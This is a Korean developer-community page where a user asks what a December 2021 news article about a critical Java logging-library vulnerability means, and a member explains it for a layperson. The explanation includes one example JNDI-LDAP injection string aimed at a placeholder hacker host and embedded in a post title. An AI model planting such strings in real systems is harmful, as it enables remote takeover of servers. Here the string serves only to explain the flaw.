Search
English
DownloadSignInSign Up
Download from App StoreDownload from Google Play
Click to apply the changed page
#개발자질문

#개발자질문

개발 관련 무엇이든 물어보세요. - 무지성 질문을 부끄러워 하지 않습니다. - 질문을 할 땐 뇌를 거치지 않고, 바로 키보드에 손을 올립니다. - 질문을 타이핑 했다면 바로 Ctr
Members51
Join
벨라
"컴퓨터 사상 최악의 취약점 발견됐다".. 전세계 보안업계 '발칵'
https://news.v.daum.net...x_trkm=t?
이런 기사를 봤는데,
해석해주실 수 있나요?
제가 운영중인 서비스가 자바언어로 개발되어 있다면 보안상으로 취약해졌다는 뜻인가요? ...
news.v.daum.net
"컴퓨터 사상 최악의 취약점 발견됐다".. 전세계 보안업계 '발칵'
😳
4
1 comment
벨라
채널장이 되었네요
참고로 저는 개발자가 아닙니다...^^!
ㅋㅋㅋㅋㅋㅋㅋㅋㅋ
채널장의 권한이 궁금했었는데 책임감(?) 생기네요.
채널대표사진과 색상등을 변경해보았습니다. ...
💪💪🏻💪🏼
10
🤩
5
😆
4
🤣
3
😀
2
🐢
1
6 comments
브래드
십여년 만에 윈도우 PC를 처음으로 장만했습니다.
원대한 목적과 뜻이 있어 디아블로 때문에 십여년만에 PC를 구매했습니다.
윈도우는 오랜만이라 떨리네요... 두근두근!
질문은,
윈도우 + 맥 둘 다에서 개발+게이밍 겸용으로 쓸 키 ...
👍
9
😆
2
22 comments
End of list
Join
개발자질문
벨라
조회수 0
"컴퓨터 사상 최악의 취약점 발견됐다".. 전세계 보안업계 '발칵'
https://news.v.daum.net/v/20211211181030002?x_trkm=t
news.v.daum.net
"컴퓨터 사상 최악의 취약점 발견됐다".. 전세계 보안업계 '발칵'
거의 모든 인터넷 서버에서 광범위하게 사용되는 소프트웨어에 치명적 보안 취약점이 발견돼 전 세계 사이버 보안 업계가 발칵 뒤집혔다. 게임이나 클라우드 서버를 운영하는 정보기술(IT) 기업은 물론, 웹사이트 운영 회사, 심지어 정부 기관까지 이 소프트웨어를 활용하고 있어 심각한 해킹 위험에 노출될 수 있다는 우려가 제기된다. 10일(현지시간) AP통신에 따르
0 click
이런 기사를 봤는데,
해석해주실 수 있나요?
제가 운영중인 서비스가 자바언어로 개발되어 있다면 보안상으로 취약해졌다는 뜻인가요?
😳
4
    산책왕
    Dec 12, 2021
    자바언어를 쓰는 서비스에서 로그를 남기는(=이런 저런 히스토리를 기록해두는) 목적으로 쓰는 라이브러리(=도구)가 있는데요. 이 라이브러리에 심각한 보안 취약점이 발견됐다는 기사예요.
    서비스마다 자유로운 형식으로 로그를 기록하는데요.(예: 사용자 접속 시간일 수도 있고, 접속 URL일 수도 있고, 오류 내용일 수도 있고, 글 제목일 수도 있고) 이 로그에 특정 형식으로 원격 서버(=해커의 컴퓨터 주소)의 주소를 남기면 외부에서 서버를 조작할 수 있어서 치명적이라고 해요.
    예를 들어, 카페노노에서 히스토리를 남길 때 글 제목을 함께 남긴다고 가정해보면, 해커가 제목으로 "${jndi:ldap:해커주소.com} 매운맛좀 봐라" 이런 글을 쓰는 것만으로 카페노노 서비스를 조작할 수도 있게 돼서 치명적이라고 하는 거예요.
    더 문제는 이 라이브러리는 굉장히 유명한 라이브러리라서 거의 대부분의 자바 서비스에서 사용하고 있다는 건데요...
    그래서 자바 환경을 사용하고 있는 동료들은 지금 다들 바쁜 것 같네요.^^;;;
    👍
    5
    😂
    1
Write a comment